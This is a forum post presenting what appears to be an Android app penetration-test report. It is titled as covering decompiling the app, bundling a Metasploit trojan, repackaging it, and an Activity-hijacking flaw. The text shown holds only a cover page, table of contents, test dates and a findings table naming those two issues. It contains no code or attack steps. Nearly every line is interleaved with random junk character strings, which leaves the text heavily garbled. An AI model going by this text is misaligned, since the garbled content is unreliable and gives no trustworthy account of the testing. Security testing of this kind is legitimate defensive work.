找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4422|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ v e4 M( b' \" S 3 \% b" z5 _; r' h% y# _

7 F& f. Y9 l5 k+ p4 L+ x I2 K, N- P
) N4 g6 V, X8 U( ^- ?9 y+ v 5 H& c$ M. j% f, P

% w, i/ I( L: J1 X) C+ D; n( r 8 ?( j5 T* _, j! U$ `
, E3 Y: [. D2 i+ ^ : r0 ?: Y7 W4 b& r/ [# w9 M* E

; L/ j/ e) g0 S( d. B' ^4 Z ( v; s& c& f9 v- S/ E. l 文档编号:                1 S, |3 G; |3 x* E( r. c& t0 i 2 R1 Q1 v# r- h

7 d: ]1 ^8 L+ N/ ], ?, q ) c1 `. B6 r9 a

" S7 z3 o; G" S/ Y4 L 8 ? M+ Z( ?8 {$ d' w$ Y+ z   / t+ v% N- j& \$ r# Q B7 P6 ^8 o: q

" h/ Q% A; j/ J6 \6 p9 C. p( i+ [0 a2 M' a6 F; k

$ I; G0 |) C0 O) }+ l $ M4 z8 r# @# V   E# r! E7 V2 y: E8 ~, j $ ?7 Z1 g9 [. Y/ O* ]2 A% p8 C7 k, B

4 N+ R! o s; }8 l0 A/ O. @ 7 e T, e; ]1 x

( b2 t) o( S0 y, }7 A" p7 |' a+ W   7 o% q. z3 C7 V7 p% o, x+ N " K: D0 E5 z* e7 y. ^3 n5 Q' W( a: y

5 X" b) j4 s! C! b / m2 H! |. x* X, [

5 @1 x8 S3 ^. b" e1 v ; r+ F; ]* o. l6 e% s4 k   ) b- W: ?) [6 N/ N+ X 6 k- n& m- h, V. z1 g

/ w; l( x' Y6 H4 ] ) u0 r5 E; m S$ L, ]

7 M4 h) Z- K; D% B( h5 ?7 M / R* R. N' [% ~$ K+ x/ T   2 Z9 ^2 X& R% `5 V5 M. T # n$ r7 N3 ]1 k; i% @( o h" M

9 j% d+ S, Z4 W6 X9 i) ] $ `* o# F* |- b. g+ b0 \

4 f3 i/ K% f4 P E2 ^+ M; E& P# o/ ]' h4 N. \; ~! }) K* r 某某某APP渗透测试 2 N# y l) |5 v. v! _; @; [) m W / `( d! E- u2 K' c/ J, ~" y

' d) Z4 ]5 g& I5 d $ c9 E1 k8 A: G# ~3 I. _

2 \% K9 f, s) b& @ , F/ y0 M+ b# {1 J2 \   5 K5 M1 p4 u$ j- _, b: j ; Z* M" K. b' G) \/ d+ J

; F7 k! T, G* T' A9 F" H# t8 G$ \ # W: F) i6 ?" e

! R9 }6 r' K. o/ u: q ! ]' h2 x; o! Z; K9 B; g   . W4 I& \- U" n, k( i5 z . B- i' K! }1 J0 W

: Z! W! D( L% p7 d* p: R. b, e6 o4 N( V! S. f8 o# q

' `: z7 f6 b- V) g6 ~7 O, k6 ^0 E0 w * x( U. G6 r" O" L6 Q' T* ~9 I, v8 |   & u* R& }& Q, h/ {/ d, ] 4 ^/ ]! F9 P/ k+ {9 k/ I& l

7 [! R; d2 v5 K$ \0 v2 w / N' K3 \( x$ O; p" {6 J

3 F0 A: G' o- |, l; t5 h; y+ ], C 3 m' z3 D0 }, P+ e6 L: N/ H   ; Z0 x9 j; O; H' Z! r/ d; Z) _1 x! u4 l" I) E9 w7 O5 v6 S& H% D

& x- e4 n; g( ?, T ! {# G) z: x% J" O7 x: ]- E s

! j: \. X3 c& w. u( j7 P* f 0 l% H( Q4 `3 Z7 { 技 术 报 告 1 F+ I: m) e% a , [) E8 l( W8 R! L0 x4 U

: b0 s& i& F; Y. Y* g6 B# E3 z" _ i3 q& }2 P; x1 W) G. u% m& a

: G- H& N- }6 ^# i3 q8 H 8 e# E) C* e; n0 t! m   3 C- e" H% z6 P$ f2 D. t # c' n$ u. j7 m5 ^1 ~

$ `! P+ Z- t2 Y( Y; E# A i q; K5 }5 D; N

6 o* t e8 i1 i) y 3 K* X3 {' V" D. t; e8 p7 G   % z: `8 K- B2 ]0 Z `7 t2 q \1 \% o* n

- g. Z) ], G5 J/ q* X4 j 2 j6 _& X+ A* `% M0 G/ v

& a1 z Z: y+ h' r1 }7 d) G- r1 b1 B9 w2 `/ S   : I' y% Y; r6 t/ {7 r) x - J. G# L9 ]& y) h# t% v

% w5 @2 `5 i& I1 X: {2 r, q7 T+ n ) S. ^) `) t7 M0 {) z6 Q) q

/ E" X% U6 y! \/ B 0 C: B9 z/ U1 A/ v) j. U   4 m m4 T. e" {6 @8 T q( j & W4 H M4 m# ^3 k% g8 }4 v }

6 X. O; w+ B6 x" Z( w$ F: X & z& v3 K$ m2 t8 R6 O1 A

0 c8 K& J$ @. p" B) `- b0 T 5 U3 ^: K" q0 U5 g: d* a   6 x1 Y4 b1 m+ _/ r4 \ % @4 x( v: [5 o

- K* S2 t. R* y: D4 d8 B 2 O: @% h1 N0 r7 C6 U% j

* u9 w: a+ v- p) K3 g- F7 e 7 B% M7 t) w* D, i( t' |4 _1 j   P; N0 s! g' ]6 |3 J8 [! W; ?$ |$ r1 S" K. `/ V X( E3 e8 i

5 T& D5 }" j5 f" S' B 4 d1 E4 `/ [* s

- i' G& X0 o" _8 h) f# B ) Q; A5 ^ X1 F7 I" j7 q! H   6 @, X# m/ h( q0 h $ Q8 e$ v1 q# b* Y, ]5 i+ a

2 E* J6 x" b0 G$ C/ r . |# N1 D# W R+ B2 m" w

; F/ N& I9 M; M2 }+ Y" I; Y3 y/ G, o* q; w, q$ u   6 D$ b- @# c9 A! F7 m, ?' q 5 ^" e) n. `5 c$ [! `

5 b5 V6 C1 x1 ^$ N5 I8 f! Y ?! g) _2 _9 A7 w2 M. i( u' o

7 P6 i. _0 D" a" f 0 q! ]: j( V; O( R   " | h. e, Z2 F& D, Q8 ?& { 1 k2 f5 W G& ]/ H Y% w

' {$ j8 Z% K7 \- T* @" `: E & a, b6 m: r; Q

' C) @4 L: m4 V$ M- f9 X. L5 z6 H9 i: |   & k+ j5 x6 X+ c2 _& i8 R % Y2 W; {7 B: { O7 W( N

6 ^0 Q, m8 @) L& S8 ^# y/ _ `6 y) A t/ `

7 \- y v! i% q/ x 4 r" C" d- b8 ~   / [- _# n9 }/ ?1 r 5 P9 J* F! ^0 n- Y3 X: p" ~0 u

/ N# S. p6 G* ^* T3 z& F' F2 i) z8 \& P

$ J( P/ z% e7 r$ N* Z1 }0 P5 _   1 [; T6 d% ?6 } # [2 P+ w/ d2 ^- q

/ P0 Y, c! q: f/ w3 ` * n$ p. l/ C& B/ P! E# g: p# E4 c

" ]" g& ^, o3 D% p$ j+ _- U' M. e# W1 k& b( S   7 x1 S1 E! e1 h7 u: q2 m9 a2 d$ h) w! a' d2 r- K

. I$ H# K7 Q& n2 I& t' q 1 g# n6 O- o$ T* P* B

5 j, ?- l; x' ^2 M% X5 \; t/ D# n& X' G- l3 T% n   . ]$ \1 R2 Z& _ 8 U. E T8 Y/ L' H

( O) z5 t' \2 h" l J+ e+ }0 @: Z1 ^$ X) t+ _

7 T* Y! C- D" d, y; b) }( E) H0 `# t . }# u$ q4 s2 k4 a   5 j; y1 d! z( Z7 n1 f7 n ' Y$ I0 u# ^: E' L+ _. J

& i2 A. V7 M3 p9 v / J/ _* {$ |3 X

# ]! y* d: X$ c9 \6 \* E' c: c 9 ^ U7 M: @1 w' u6 X   1 {0 T3 r0 q/ P1 a8 L! ?8 v. p . I8 o, M ] m1 M2 i7 i7 R* d

5 F4 c) V8 F5 x$ ~5 M/ L, R) W- Q2 X, F# m1 X

# Z/ v; c4 g# n2 o5 R0 A. p+ D9 z7 E# V. }   7 v8 L4 m- M$ g8 U $ c1 o# F8 `- m8 S$ X

" v7 q8 D T. h; q5 u 6 P+ m% ]% i: g# G y/ j0 c

# ]5 ~4 ^7 n$ v0 } c6 q! b c 2 t2 K- Q/ _# K3 E" a   " L+ Y- N9 S/ Y; u+ W1 ]% p2 ` % U& r" |8 d8 \

7 z; \0 n" ^9 ? u4 J 1 U, `3 |& N! h

$ L6 [" C" S5 K. N1 j % K) N* b" [$ I0 f" K7 X 二〇二〇年 0 d, v: T! ?$ p# [9 b+ x) a 8 N. D$ R2 b3 T9 J! D3 f$ a

8 c$ g# O# ^9 i: F a: B* Z0 E4 J* n" k7 d3 G7 P- q4 {
7 ^+ R) ]) g8 q% z7 A5 I1 m5 ^, k) Z& I
7 Q0 Y4 k3 {! j 0 y' h4 S C% y0 V0 p 8 A4 \" [3 r% a% q; x - s: p: s* K5 ~5 t4 s
( l- B, }8 h* k) I 9 W) K7 X. u6 w8 {& q9 F( {) B
+ Z# z& x7 i5 z# K * }7 \/ _* _& z
$ n- H5 O/ K& {* Y# {* H |" w * c& Z9 |8 h7 R- F2 R 6 G _4 w. \9 K' s8 F! o8 _( W& m1 Y) F
7 W* k" Q; l" {2 p2 V- G : H0 {, X1 a% n7 ]0 Q* k

' @( p0 w, e6 V8 K6 [ . Q5 Z; O& g. v/ H 目 录 % _* ~" ^0 W! i4 x* `( q, _; u4 m8 n$ g5 p: A4 L& b

6 Y' w' d6 l3 x. C3 M 9 }. ~, ` K f: s, j! _ 4 y, P4 i# O5 @, i8 C% j: ]+ P$ O1 ^0 F# m

& P5 g# b/ L: w, q4 l" b; @* A" a/ m/ P6 w& Q) M6 T' g$ ~! a   * i& g: Z8 Z, t! u7 x `0 I Z0 N- s* c" ?6 w& m5 V

_/ f! ?3 W X/ A6 N ! V( ] Z! M4 q

" ^3 |: G, w8 f6 V+ U& H 7 b# s7 s. E0 Y! ~ 1 概述... 3 5 {/ B- X3 T* b% o; M: Q2 w0 S ! i6 q/ Y1 W$ M

) S$ x& w. P8 r' W$ j " ?1 T( @* |& F

, F8 @$ O# o7 P w% _, ?5 C - ^0 F( ?3 \$ m 1.2测试时间... 3 8 n( B' t' N# H1 i) e/ G+ I z8 H* `+ `7 S+ q

; H6 P9 j6 ?7 @; V& j5 B) C 6 C. E! F% ^& ?

% t; }( i, v8 t' U7 O9 z5 \5 l9 F: B / ? q/ T% `+ _; z( i9 q 1.3测试对象... 3 & j' A, l/ w4 }% s . y, J" g7 o/ ^

- Y7 V9 Q2 C3 u6 r2 N4 k ; n) I, G9 f' D4 H, b; Y- R

/ N+ A0 t x& N3 L3 @1 x % N+ m' c0 I8 O- L 1.4测试结果... 3 R, Z+ N3 n$ g) y: F ' y8 q& c# @; M" m0 Q

5 U/ d" s: k7 ?: L% m4 o } 1 O0 w, ]" W. p* q

# z, q8 _# C6 u5 g; u. G" w) B% n $ Z( g e8 r- L& C- u 2 检测结果... 4 # \) C6 w+ L8 N6 W; Q- B2 L+ a! X) v# ^8 i4 B4 v

, r( k+ U$ `' J S # Q& `8 R( F6 P+ H

7 B/ V5 I# x9 R d# w" ] 7 d( D0 a9 i0 s' d 2.1 某某某... 4 ' k9 H0 L8 G, i9 E! W 1 ?9 G. W6 M2 g% K% d

/ n: v0 m. [0 A1 B1 u9 w 0 Q( h6 X# |, |+ N

- [, {) c+ p) R: K6 {2 W" T+ ] 4 ~% {+ d/ N1 @% R, B2 G 2.1.1检测目标... 4 2 h% r, C: u6 i5 _" b0 m( `& u ; b7 _& _& `) B1 ?0 M9 m

) o) O/ P! ^( t M& Q- [" S $ Q, K, B2 l4 m8 w, M

0 D: x, e% u/ o3 Y + T& Y4 Y3 p+ ^ z# s 2.1.2检测结果... 4 & s5 c+ B) `; e* d5 a/ |% @ L, g4 [" B4 ^8 s8 K

% L. q1 W, n1 X ) |; w% n2 P3 O8 @! N5 C6 ?

9 ~. S* G& a, d! z* H# q6 p 3 _, w# @; T: k/ D0 x7 n 2.1.2.1. 4 * c$ ^& ^* c/ t( t, c 3 t( Q& k9 w4 p

2 D/ G5 y: |1 Y 3 {1 s8 i1 a) D# |* D) Z+ G

( d( t* b5 I( j$ ]7 @ 9 f. k; ^- _1 ^ c8 S0 l 2.1.2.2. 6 / i/ ~' r4 U- U1 Z( S8 N . g7 d+ L2 W. Y9 Y. z9 ?

0 @; B5 j4 K; a+ J 6 y1 I& S( d+ Q* T$ t

0 x6 T% T' [* y: s , t4 }& J0 n5 y2 U: n & @3 O: \/ Y5 y5 @3 ]0 q: O$ P# _4 A+ l9 |2 w" z

3 y& t& Q! `/ c% Y1 D" l8 W* b 9 h8 `. u; v& C$ t& S2 K 4 P y2 I: p1 Y 1 Z6 [& |* @- G' H0 j
, U/ x" @% I/ F& g. o& Q 2 h5 f" N4 q' v0 }
2 H% D% o4 y5 A, R- W 1 | i- b7 L$ R 9 }; F8 Y4 K ~ ' B% X/ v ` R$ `( N# [' m

0 w) x: W& [5 j7 T# V2 U2 c* x ?. E2 [( ?* S# n* @. X 1 概述 , v3 c( h: w) b5 P5 k 7 h1 P6 g( X& W( h

. o: `5 ]5 _( ?7 w9 @2 O* {6 |2 k4 O7 A9 e: ?2 ]" c* O

5 N( ~7 z1 ~! [/ v# r% V% U o* B$ Z' n5 [ 1.2测试时间 0 g+ n6 {7 c' L+ m$ t % g. U* l6 ^7 V( j- V3 b, u/ W

7 |3 n2 C2 Y! _ ( o- c3 K0 V1 F9 b4 D l 5 Q; o9 j1 F9 k5 R/ L$ ?# d, ]8 l4 l5 D' G$ Q R. M. G) a2 W3 r _5 [9 S# |- c' b& J$ ~5 S$ Y$ ]) k" q; I5 n# h- f: |) I+ x: p9 C! f2 s5 N0 C( J* b( E8 `: `( U5 |" K7 z0 d' w! _0 o& q' c. r0 f, X Y) ]9 r [+ c! [& T- }7 {8 [8 p) g1 {2 O8 @% k1 G$ f6 b7 Y0 j- w/ K; P8 |0 W& _6 L C0 W% u o9 P: Z7 b0 ^4 H. J: L, h" b O" k5 i- o% f0 R6 v9 r% h- B' ?( K$ N6 s0 h8 z* L) }; z W- V7 U* ~1 r; P# B/ c8 D9 F0 a. Y. u% i7 h- m9 w4 u, I. N$ ]0 |6 V6 G/ ?! y9 T" f7 Z9 Y, V# H7 }) y8 z0 M& r4 o& H$ S( I. Q" e6 M. A2 ^2 X: I7 U' l2 y% v- j) A) g' z N/ t( l2 _; ~+ [/ g) D' h0 j" Y# Y: l+ X9 Z8 \7 l# a$ p, C+ D- D7 T9 W3 ?# {) M: j& Q, T% V" d! W {
4 I4 z* `4 H7 C7 l2 R 0 e( N+ C% q( P; m( b% V8 M

, i' f6 I& H, I ]/ A$ J$ t A ' h" d; E0 f# @$ Y 渗透测试时间 / `2 @) S: u/ c0 p9 B5 |; E" I3 l! `' K3 E( N" S/ b9 K6 s

3 S2 U- Q5 S' Z" \" K / x/ h6 t) d$ [8 E; O
& B( J) K: P# s 6 G4 v; |4 m# x. X

3 d1 D8 ^% k/ A( A+ j2 @4 l3 U2 H4 h+ S1 D2 x; d* C7 I% F 起始时间 % m8 W' I. n8 w5 V. h6 B1 r8 H% o( f# G% {0 k

5 s" F$ E0 v: ~2 M& @. d/ b" Q; v1 v- K ) [+ N; r- R9 B% V 		|+ _( t; f* ? 0 R7 {/ @9 u% p0 C

0 y& e @% O4 V) q9 Q, d- s! I; j: u; I% O; f$ H9 O6 T 202046 " z$ B4 X- T* ^: q$ P, Z # {- {5 \; l# q% g: @+ C) k

( A! f$ C; S7 y3 p* Q / z7 e. B" P$ e
2 h. T" t) b+ S" q 4 g5 D: r1 u7 I, Y7 K8 }9 L1 d

, _8 E" `9 n, \/ \# ?8 D% b; _ V( L! a0 m 结束时间 1 R) o$ r2 r6 M. t0 ~) G1 s) C. C: c" @' m8 p# V1 l1 y

- e _0 [( E( |/ s, {! @! W. H ) p, r; `4 |" h8 @$ A. ? 		9 ~1 ]3 a/ Z' {) a: p3 a# N1 k6 n0 }4 @3 E: {$ d* |, \1 G

+ D# l, z9 V" w' W- @( A1 O0 H g$ R$ P8 y5 u 202049 4 i+ U7 { a/ [" J * v9 |9 B# k/ ?

2 `1 p. L& H$ o2 ]! ~: W 7 z' W9 V0 `1 @& u
$ ^: |* [5 l6 A! i- Q1 W% R9 G3 r0 u$ a& {' k9 s% g% z4 K

, Y( }8 t+ I" S. u; o1 o, P1 L ; T. A2 n1 ^/ c* ] 1.3测试对象 0 G, a# T9 n; L' a8 V. m( P- C i. P' z( t2 d6 g, d# U0 }8 q3 q

4 d/ b* r5 ^) p 0 Z8 r; A- d% E P, [

5 a# y2 v; i) E- S$ T& l" ` 7 b8 _" ^; D* F6 Z# G4 M% U 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: $ [5 l, b3 h4 j; ~% a , V8 J- m# G6 L' S1 s3 M0 H

, c6 J, r7 ~) a* E6 A- G- F 0 ~3 J3 p9 S1 \- Q7 ]( X2 B' K

! |$ e% X1 g: N7 _0 S 4 K+ S5 {0 C# k8 _' e7 P- v: m 1-1 检测对象 . h! r: j3 B# d" o ( r) C: O# V4 n% R4 T: v( S

6 D. F6 g2 j7 J1 [7 ^, D: O* `6 A $ e2 ~( x% }) y+ ?0 S4 w " k) L/ ]7 Y6 ]- W5 S! T8 q3 s, {' D/ B- E6 t! E \' q6 o% x w$ r' R% ^* u3 f) N. {% o6 r2 T2 V+ |9 \8 s9 y# Y; {6 k1 W. Z9 W7 }2 o! _, V+ O4 M3 v! E# J& g. v" ?+ B# b# \: n0 w, t I7 `( e2 d. [" y7 l# k, ?, O. D1 w' i- d$ x3 g+ t5 q( }* N6 b3 F& W% G6 d0 u8 m" U" \; V5 w' L) p' A& B* z; a# [$ T: X* x1 h* @; Y+ s* g; H! `. J7 k% o8 B$ o; `" c9 z2 @ D9 X0 I* t1 R* S, `3 D0 s# C! @9 c$ h, c& n2 e* F5 \2 g: w% W: b9 T t( @; J9 `# O- }" m I, f. E, @) b1 o& x7 o E7 `) T' {9 e2 j' N+ x4 S, \9 Q! Y. u8 O" E! n; R( j) i; t+ V, @8 e3 S& h& c! z% Z5 R$ C9 t) K0 w' ?2 M) r' x7 C5 _0 t( c7 Z2 N; Q. ~1 G- ~- G( |* d9 u" k# K( I2 s9 Q: z A$ Z j( ?" r# C& E7 N! C* H* V9 E1 |9 M* P, f. C! [3 W+ u" O$ T! h) k
6 Y; p9 t9 C2 G. J' z . L1 S e7 }0 ^; ^

/ z0 Y! u1 P" g( m N2 z+ c1 A0 F! P. `9 O: W1 _# F( E 序号 5 Q$ {- [9 d2 ^ D# r6 Z; F8 H, s$ D

6 X; T& d* U' b/ Z- A2 y, | 5 }0 V% |3 {/ U* ]4 }: N2 r# u 		: u9 q3 [+ i: U# l; R# G2 k 8 |- z" ~ j# _! }) e0 c

- n" z8 i% f7 b! C' M m: b( x # ?# U4 P( e3 _0 h& t0 x 测试对象 ' b& Z9 {, l: B8 y ) s" S: X- [/ G7 {: k8 v1 ?/ M

' G3 y5 j* L6 @ ( J) W2 u% p2 _/ }7 D 		1 t% r2 \" q/ t9 V- A& A$ _ 3 S0 c# ?. l8 i; U: @

. p: c/ B2 T9 x 1 B0 S Y* {3 U0 c2 O# e- k 测试地址 8 o& Z# N: x8 O % s4 V6 s+ r; B3 a: o: y/ v

2 ]+ d+ @0 _( h - R% K$ N2 \. V) f9 L 		8 U( P7 ]- V$ c/ C, N; \ 5 U. w E& {" m, N+ ] h

. _$ @9 s/ s8 W/ E * q1 b( k2 Y: g" d 安全漏洞 1 C0 t. Y) i9 Y% Q( C 5 V8 _$ ?1 G2 b& s/ _& U

/ m9 x, k; @+ T; `# `4 P( }8 Q/ g+ _; r. ~* S. i* _, u
9 f7 {( f+ V i9 f3 N" E 0 M$ m5 q' @9 z( Y3 X* M

& t [* Z- a2 d( d . Y T2 ]" f7 L+ q* a) b% y6 W) j 1 7 u3 z1 {* W. H0 c0 f& o* ` # @, K+ M* n- E D* _$ n6 Z

' \- L g/ Z8 w$ y9 q, j9 ~: y3 I, |: q+ A5 A( x 		7 _' w* @& o: ~ 1 i ^. R; y: v0 S

. g4 ^" r- T$ ^2 `$ h2 o+ S: H: j( ~ ) e1 T0 N( `5 w) r 某某某安卓APP ( W3 m% ~! J0 B D O. F$ x " G6 Q9 F( u4 l

: p) r% u! e- _& S8 Q 5 p: q6 t6 K _: E/ a; | 		/ t3 Q. J R6 T' m9 R5 m. J: U- ~ 3 b) Z) G2 M6 {" a. J- Z8 @

) n8 q# `' ]6 L }/ x) V. D6 L : a5 k6 w) E9 X1 ?. K. @7 A   4 `" ?2 `* [8 f. H 8 |* P# v: e( ]* Y* G

?6 z. C3 S; N! @1 n 4 N2 a2 \: V! e- Y1 D 		( e" F% C; _ {, I: _ ( L' U0 {6 S0 B/ ]9 B8 F7 Y4 V, Y& o

6 i2 p1 C" p) I: U . M0 b$ i) C5 D$ D+ k 2 & d5 o2 p, t% L* o w2 X5 A6 c; I8 v

5 {8 R0 Z% ?9 a$ v. I; x) Z ) ^2 M; W2 Q( n) N/ O" p# k
' x8 [7 T) v9 |/ P2 G* w( u/ s$ w e& x6 W! @6 f; c0 D6 N* m

( U/ T# \+ q T9 t( [; j# Y2 t5 v7 N0 D" o" W 1.4测试结果 & ^* v. Q! G6 I$ |) u- w 7 {7 H4 X" G* e& {5 `& f

2 K! g9 G+ V0 b" b, p9 b8 u% H3 I& ]6 M' p

. }4 p7 Y3 C2 Q3 {' ^! u+ Q5 p+ G, S- B5 a, W 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 |- X/ L& V$ c; z/ ~8 |, x1 A2 w9 \5 n9 e8 X# Q1 A% k

8 }4 V; y4 ?* S5 T9 A9 B' H$ Q ~! }, q9 w; Z% _( Q+ M

" b( T x+ f, U9 r% R' @+ V* j& ^   ! ]+ V/ J' F9 E! N; [! m6 C5 X 4 s0 \- q# t# V3 [# @. }* y0 g

) k# E! R# E& e) p i" i $ v5 Q0 I( o- o" k! {6 Z; H
% \) @+ ]$ o% b" ~/ n- l" N* K" r. a. O % r! o, E1 O6 j1 c+ Y1 Z5 m# f! s- N3 g! O1 E9 z( ]! \; x: `+ A/ O0 N& r+ \1 y6 x. R. s1 K) ~& V$ X# [, A U0 V2 M! Y, G6 L8 V8 t+ v w1 w. D5 V! T3 z7 K. o" b5 K, X3 N# v! o6 \! p+ U) V2 u2 y* z1 _. I& ~( Q# a7 {. T: \) D; w: \) {& q$ n# x' a3 m% x$ Y+ j* ~% A4 [+ E$ [# Y! k1 q6 m; J7 }) l6 W+ d8 T, r! `1 j8 s, @+ H6 g3 z u# G2 g* K4 B7 B2 t; i/ C+ U9 c* b8 q: N8 o$ o- o& t' A4 }: b: p0 ^6 }4 l" c4 |" e8 a5 U8 F$ F# g. e) H8 j9 D+ x. @2 S2 L0 |! V4 a4 D) O9 U9 l4 e0 ~5 x" x4 w9 C5 {, R3 {2 C' W& Q$ `) i! l2 o' f% G3 V# R) v" g7 o0 g6 u3 ~6 k" v0 x4 k8 o" B% a3 d4 @; |( x* N4 _7 `+ o+ r8 o6 }( M* h3 b& X6 ?- z5 P" \6 x) b+ Z% r2 ]( x; I5 k5 F& X3 y5 R( Q2 B" Q$ T( q& T+ C; ]6 b1 u9 N6 L) |8 Y0 R( ^ N" \- x9 P4 h; O8 u, Y8 N; E: N. H' e( Z& W+ P, D6 Z) W3 F& f8 ~: f( X) l; c I, v8 `: E, Q0 n2 |. U7 N3 T! |7 ]* d* _; m, o" Y! [' N, n1 a& p) Q/ D, t# a# L- t; C3 |. L/ g( f* t7 H6 E' D% }1 V% k3 J( }$ e6 a3 C. d# A2 R3 W* I" W! ^) u, C& m0 u' |, k) d3 v- a, ?" O r) G/ e- n& n' m) ]5 X. f1 W2 ? \0 _( u0 s0 g# h" z! e0 z/ f& s1 C1 K# d) g. t5 |0 _; B% k; A% g
2 K1 k4 A3 H0 I# T/ q+ l # g& b) T1 ^3 l) P

; v) b8 p) \6 ~$ @( r $ j9 M& g5 e- U& w3 f 序号 1 w2 C9 k& N7 x& W O& w6 J 8 O: k8 L) A e+ W

6 L! j# x7 R$ G( {8 {5 R9 y) T# p& u! { 		$ u! e5 K' V. v 9 r6 m) g; Y* w2 F$ T# p

' b1 Q: ?' |, o9 |7 `" m) @( [3 ~2 W 系统名称 ! E6 O! g% @' H5 R. n, | d, z $ V! [3 ?% T$ ]4 W8 {# G

) z4 U3 x2 Z/ |/ @ # c3 T y9 ^- I: W. i9 C% o 		$ A8 G ?4 v+ X! B ! k9 z4 p4 ]( _* g2 \

0 o m% d! S# g; s1 l% O; v7 |" s2 Y9 h9 J4 q7 i, d6 q8 q$ M 漏洞名称 5 z$ _3 }) ?* U1 D( H : ]7 }' U. ^3 J3 l: V4 ?2 L

, K8 q# }5 _( S# P7 }! f5 ?4 h. Q ! s, g/ o+ D& k' P. _/ F8 z 		( ]( d2 O* ^2 P4 Q7 y A" y " j$ A/ j* w4 Q; h" [0 J' A

/ g! i, n6 }- r4 ]6 T 7 i( C1 y7 p. O. ? A7 h+ b3 U 漏洞危害 ! H5 n) R/ D3 J" S' Q8 p4 b+ j( h% t( Q

' d: B/ l. w; B( L4 ?1 J/ Q6 ` ! Q" x/ V; j1 d" Z7 _5 O) d 		) Q, e/ j1 z# m / P, q8 I9 c Z* p

1 t% K/ R) Q/ D* Z, Y h+ l. H 7 h- E1 O( {8 e: P 修复结果 6 _2 _$ L: x" q! d$ s! b' l6 A" ~/ K8 D' A4 D! S. ]

$ W. x) E# e( {$ d4 W, {7 E & ^2 A4 w7 F4 { z* D
3 Z, n7 e6 o% ^$ l' j( V+ d. n8 j$ A! h( P6 b8 K. i6 |2 W

, {7 h! |6 P1 h 0 g" X* B6 _3 I9 I' y 1 . b; s2 [: S% n" k0 H1 Q! B 3 [) g/ k6 t$ B3 h8 v4 I/ ^ y/ ?

' h L- z9 \8 H+ J 0 ~8 g" t2 y" a8 K 		; E& [0 T) l: M; }' U3 o0 Y4 D3 O. n+ o2 w

- y) |( L0 u- i' o% {" e. S 0 t& _8 R* p' G$ C4 E' x 某某某某某某APP 0 T7 K* P# W5 ?1 r* {* j3 W % A* ]4 s: K! x+ s

% B( G W5 `$ N( h$ X. L% k& H+ Q, V9 p4 |8 y% f- }- ^ 		3 K+ S5 W9 F7 }5 Q( @ $ n# z) Y3 y) W( V2 X3 Y4 x# R% n

7 H b; F# Q( e ! q8 C* ]7 {* B( U8 s Activity 劫持 6 g, I2 }) o, X3 ?8 c1 T k, y' N/ i5 S% W

, Y2 r6 z; Z% H8 x- ^5 S& S0 Z / z* g; O) D, C: @1 Q8 I/ r

# ]3 \1 d% c- l- d , ~/ ^/ m# H4 L, g   $ W/ g. N& j V2 k! D / `4 ^- F+ u* F2 K0 R

$ r: O7 f: G! J" c! u; M+ G( p( O( k2 }0 ? 		- t% m6 d0 @, m) V5 I0 J1 Q7 m/ X $ O9 ~/ C3 ?: t3 L; v& D. `: d. F

; v4 A+ A7 [' G' R/ ^; y; E 7 H z# b6 Z; W/ v6 @) p/ R / t D+ @- @$ v8 A8 G, ?4 S6 S 1 K8 b8 G$ y' J# h

0 V, w" h8 D$ ]+ o ?" t& t* m8 J V3 f+ ?- ~; h- ] 		# T" \' u% y" B2 D; f3 P/ K( d1 }# F2 ^ f0 V

) ]5 Q( h4 y# w! C9 w5 Q# k( _( J2 s& Y9 T- q   . y' S3 [, @, _, P7 ^ 6 z. H `0 b" U5 O" ?$ _' G

8 U4 t% y2 `2 |% q/ O1 R- M) e' h% q: J& p
* T% T. g( R h: M+ p4 |2 l8 q 4 n: `9 r# a, i( I, p( W( L

4 L8 _) U5 A& ?# N. Y/ \; [; e, K, N0 }. H' s* I0 o3 I$ [2 W8 [4 u0 X 2 3 ?" n& N5 g9 s* ]# t2 w ( F# F8 d4 m: _& ]* {

$ H. d( V5 g5 Z% t; n " c1 R H- S6 o; ~6 k 		2 V& `# |8 d) G- R7 K4 n3 g {: B/ r* f7 F, p) W5 K

' x/ o1 R1 Y8 ] e Q* W2 r! X7 c# A 某某某某某某APP D/ F( o; J- E1 e* e' k$ A # M8 a# |# y: o+ O3 C

% H' u. ^7 Y, g$ D8 A- W4 t8 E! _) U6 y 		+ S/ o1 u$ j7 I* t2 q; Z2 b L/ [0 t- q9 @8 Q) g: L

* s; B, X5 e; \2 F9 i1 G3 \ & R4 S2 V- h# H) n/ |2 h 反编译二次打包捆绑木马、篡改APP代码 # B" s+ S! n' N& j) E) S: p% I3 Z7 X& u T

% O" S5 n2 w/ I3 Z, i1 {& P& B & @1 H. f" \* w+ p0 @2 t6 Z 		" E2 J7 }. C: {5 j$ z 7 Y9 U" j" W4 k: l$ @1 z! k- e

7 N T8 o, _; f& z 3 n2 ]& z% P5 r3 s1 \ ) Z# D2 d# b [3 V2 `' X5 ]: D2 o+ y. V

; [6 v4 S. Z- V5 H; X; Q 7 r: u$ a! R1 D" B; X3 V 		! v4 k5 H( `( |; _3 b 6 W- S! j' T4 n! w' {

# O& Y& L; r0 r! I* G* R! _) n & g9 E. I# j+ Q   3 d# [5 v! M8 n7 Q$ K - b3 O2 x* o- |9 g4 _. T

/ c1 u5 Z ]- ?' v) |9 N- X0 i3 l: J: h; X" s+ }; d' t
/ \/ W {1 V% g S8 D# F; h: Q0 F' y2 O, } ; G( _) q: q& P3 T6 B7 @2 X
G$ \' m9 N* H, |) g $ {/ W/ v8 v7 e6 |7 ]

3 `/ n8 D4 V& F% W/ E5 f # x: `3 b/ X7 C   1 o& U# \% J* d2 U2 G$ L % S* G- A* m, A1 C+ l6 P

) a8 W" A0 v0 w: L6 B1 C / z2 ^& N- D1 o

